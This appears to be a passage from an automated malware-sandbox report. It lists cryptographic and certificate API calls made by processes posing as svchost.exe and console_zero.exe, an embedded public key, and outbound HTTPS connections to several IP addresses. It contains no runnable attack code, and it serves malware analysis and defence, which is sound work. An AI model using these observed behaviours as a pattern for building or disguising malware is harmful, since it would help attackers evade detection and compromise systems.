Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92FA030 OSSL_PROVIDER_do_all,CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid, 28_2_00007FF8A92FA030
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9340070 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug, 28_2_00007FF8A9340070
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9312000 CRYPTO_free, 28_2_00007FF8A9312000
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F4060 CRYPTO_free,CRYPTO_memdup, 28_2_00007FF8A92F4060
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9310010 CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_free, 28_2_00007FF8A9310010
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931C0D0 CRYPTO_free, 28_2_00007FF8A931C0D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E40E0 CRYPTO_get_ex_data, 28_2_00007FF8A92E40E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93040E0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free, 28_2_00007FF8A93040E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F9F30 OSSL_PROVIDER_do_all,CRYPTO_malloc,memcpy, 28_2_00007FF8A92F9F30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F3F00 CRYPTO_free,CRYPTO_strdup, 28_2_00007FF8A92F3F00
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DDF70 CRYPTO_malloc,BIO_snprintf, 28_2_00007FF8A92DDF70
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9341F30 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A9341F30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9305FA0 CRYPTO_realloc, 28_2_00007FF8A9305FA0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931FFD0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A931FFD0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D9F90 CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse, 28_2_00007FF8A92D9F90
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9337FE0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_CIPHER_get_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_mark,ERR_clear_last_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_clear_last_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug, 28_2_00007FF8A9337FE0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DBFF0 CRYPTO_THREAD_run_once, 28_2_00007FF8A92DBFF0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A935BFA0 EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,ERR_new,ERR_set_debug,EVP_PKEY_derive_set_peer,ERR_clear_error,ASN1_item_d2i,ASN1_TYPE_get,ERR_new,ERR_set_debug,EVP_PKEY_decrypt,ERR_new,EVP_PKEY_CTX_ctrl,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,ASN1_item_free, 28_2_00007FF8A935BFA0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D321D X509_VERIFY_PARAM_get0_peername,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,X509_VERIFY_PARAM_get0_peername,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init, 28_2_00007FF8A92D321D
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F1210 BIO_s_file,BIO_new,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,strncmp,ERR_new,ERR_set_debug,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free, 28_2_00007FF8A92F1210
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9323200 OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_delete,CRYPTO_free, 28_2_00007FF8A9323200
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9313220 CRYPTO_zalloc,CRYPTO_free, 28_2_00007FF8A9313220
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D5240 CRYPTO_zalloc,CRYPTO_free, 28_2_00007FF8A92D5240
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A930B2D0 CRYPTO_free, 28_2_00007FF8A930B2D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F92F0 CRYPTO_realloc,memcpy, 28_2_00007FF8A92F92F0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931F290 CRYPTO_realloc, 28_2_00007FF8A931F290
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93592A0 EVP_MD_get_size,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A93592A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F32C0 CRYPTO_THREAD_write_lock,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock, 28_2_00007FF8A92F32C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A934B140 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_size,ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free, 28_2_00007FF8A934B140
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E9120 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock, 28_2_00007FF8A92E9120
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A930D100 CRYPTO_free, 28_2_00007FF8A930D100
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9321127 CRYPTO_realloc, 28_2_00007FF8A9321127
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92FD140 CRYPTO_free,CRYPTO_malloc, 28_2_00007FF8A92FD140
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93251D0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,ERR_new,ERR_set_debug,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_MD_up_ref,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_free,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,CRYPTO_free, 28_2_00007FF8A93251D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93051E0 BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free, 28_2_00007FF8A93051E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9325190 BIO_free,CRYPTO_free, 28_2_00007FF8A9325190
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933B420 CRYPTO_free, 28_2_00007FF8A933B420
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92FD440 CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid,CONF_parse_list,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A92FD440
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9341430 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_strdup,ERR_new,ERR_set_debug, 28_2_00007FF8A9341430
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933D4E0 ERR_new,ERR_set_debug,CRYPTO_free, 28_2_00007FF8A933D4E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93474E0 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A93474E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F34E0 CRYPTO_THREAD_write_lock,OPENSSL_LH_delete,OPENSSL_sk_push,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock,OPENSSL_sk_pop_free, 28_2_00007FF8A92F34E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933B4A0 CRYPTO_free,CRYPTO_free, 28_2_00007FF8A933B4A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A930B4B0 CRYPTO_zalloc, 28_2_00007FF8A930B4B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92FD310 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A92FD310
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9355360 ERR_new,i2d_PUBKEY,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free, 28_2_00007FF8A9355360
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A934B370 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,CRYPTO_malloc,RAND_bytes_ex,EVP_MD_CTX_new,OBJ_nid2sn,EVP_get_digestbyname,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free, 28_2_00007FF8A934B370
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DD360 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free, 28_2_00007FF8A92DD360
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E7360 CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free, 28_2_00007FF8A92E7360
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D13A0 CRYPTO_free, 28_2_00007FF8A92D13A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9323380 CRYPTO_free, 28_2_00007FF8A9323380
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93493A0 ERR_new,ERR_set_debug,CRYPTO_clear_free, 28_2_00007FF8A93493A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9351650 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A9351650
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F3650 CRYPTO_THREAD_unlock, 28_2_00007FF8A92F3650
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9339620 CRYPTO_malloc,ERR_new,ERR_set_debug, 28_2_00007FF8A9339620
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93236D0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A93236D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93376D0 CRYPTO_free, 28_2_00007FF8A93376D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A934B6E0 EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,CRYPTO_malloc,RAND_bytes_ex,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_CTX_ctrl,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,ERR_new,ERR_set_debug, 28_2_00007FF8A934B6E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92ED68B X509_VERIFY_PARAM_free,BIO_pop,BIO_free,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,OSSL_STACK_OF_X509_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,BIO_free_all,BIO_free_all,CRYPTO_free, 28_2_00007FF8A92ED68B
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93056D0 CRYPTO_zalloc, 28_2_00007FF8A93056D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D36C0 X509_VERIFY_PARAM_get0_peername,BIO_get_shutdown,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free, 28_2_00007FF8A92D36C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93416B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug, 28_2_00007FF8A93416B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9339540 OPENSSL_cleanse,CRYPTO_free, 28_2_00007FF8A9339540
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A935B550 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A935B550
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DB500 CRYPTO_free, 28_2_00007FF8A92DB500
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E5500 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup, 28_2_00007FF8A92E5500
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F5550 CRYPTO_malloc,CRYPTO_new_ex_data,ERR_new,ERR_set_debug,ERR_set_error,X509_up_ref,ERR_new,ERR_set_debug,ERR_set_error,X509_chain_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_strdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup, 28_2_00007FF8A92F5550
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F75B0 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,memcpy,memcmp,memcmp,memcmp,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_clear_free, 28_2_00007FF8A92F75B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93275D0 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A93275D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D9590 CRYPTO_free,CRYPTO_memdup, 28_2_00007FF8A92D9590
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933B5E0 CRYPTO_free, 28_2_00007FF8A933B5E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A930B5F0 CRYPTO_free, 28_2_00007FF8A930B5F0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933D5F0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_memcmp,ERR_new,ERR_new, 28_2_00007FF8A933D5F0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933B590 CRYPTO_free, 28_2_00007FF8A933B590
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D15D0 CRYPTO_free, 28_2_00007FF8A92D15D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93395A0 CRYPTO_free, 28_2_00007FF8A93395A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D35C8 CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags, 28_2_00007FF8A92D35C8
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E3820 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,CRYPTO_realloc, 28_2_00007FF8A92E3820
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A934985F memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,memcmp,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,memcmp,memcmp,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free, 28_2_00007FF8A934985F
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933B870 CRYPTO_free, 28_2_00007FF8A933B870
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D7870 CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free, 28_2_00007FF8A92D7870
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D9850 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_decapsulate,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free, 28_2_00007FF8A92D9850
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E5840 i2d_PUBKEY,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,d2i_PUBKEY,EVP_PKEY_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free, 28_2_00007FF8A92E5840
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F3840 OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A92F3840
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93438C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug, 28_2_00007FF8A93438C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933B8C0 CRYPTO_free, 28_2_00007FF8A933B8C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A930B8D0 CRYPTO_free,CRYPTO_free,OSSL_ERR_STATE_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A930B8D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93318D0 CRYPTO_free, 28_2_00007FF8A93318D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93218E9 CRYPTO_malloc,CRYPTO_free, 28_2_00007FF8A93218E9
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93078D0 BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A93078D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9345760 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A9345760
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E3700 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A92E3700
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D1740 CRYPTO_zalloc,CRYPTO_free, 28_2_00007FF8A92D1740
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E5780 a2i_IPADDRESS,ASN1_OCTET_STRING_free,X509_VERIFY_PARAM_get1_ip_asc,CRYPTO_free,X509_VERIFY_PARAM_add1_host, 28_2_00007FF8A92E5780
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83C04A6 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,_wcsdup,CertOpenStore,GetLastError,free,free,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,calloc,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,malloc,fclose,free,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free,free, 28_2_00007FF8B83C04A6
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B8372B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext, 28_2_00007FF8B8372B80
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83C2CC0 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, 28_2_00007FF8B83C2CC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83BFF30 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 28_2_00007FF8B83BFF30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83C31F0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx, 28_2_00007FF8B83C31F0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B8372B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext, 34_2_00007FF8B8372B80
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83C2CC0 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, 34_2_00007FF8B83C2CC0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83BFF30 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 34_2_00007FF8B83BFF30
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83C31F0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx, 34_2_00007FF8B83C31F0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83A74E0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext, 34_2_00007FF8B83A74E0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83C04A6 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,CertOpenStore,GetLastError,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,fclose,MultiByteToWideChar,PFXImportCertStore,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free, 34_2_00007FF8B83C04A6
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83A7560 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 34_2_00007FF8B83A7560
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83A75F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 34_2_00007FF8B83A75F0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83916F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 34_2_00007FF8B83916F0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B8391820 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext, 34_2_00007FF8B8391820
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83918A0 CryptHashData, 34_2_00007FF8B83918A0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83C28A0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,free,CertFreeCertificateContext, 34_2_00007FF8B83C28A0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83918B0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 34_2_00007FF8B83918B0
Source: svchost.exe Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Windows\System32\svchost.exe Code function: mov dword ptr [rbp+04h], 424D53FFh 28_2_00007FF8B83A8DE0
Source: C:\Windows\System32\console_zero.exe Code function: mov dword ptr [rbp+04h], 424D53FFh 34_2_00007FF8B83A8DE0
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49885 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49965 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49985 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:49994 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:49997 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:50005 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:50008 version: TLS 1.2
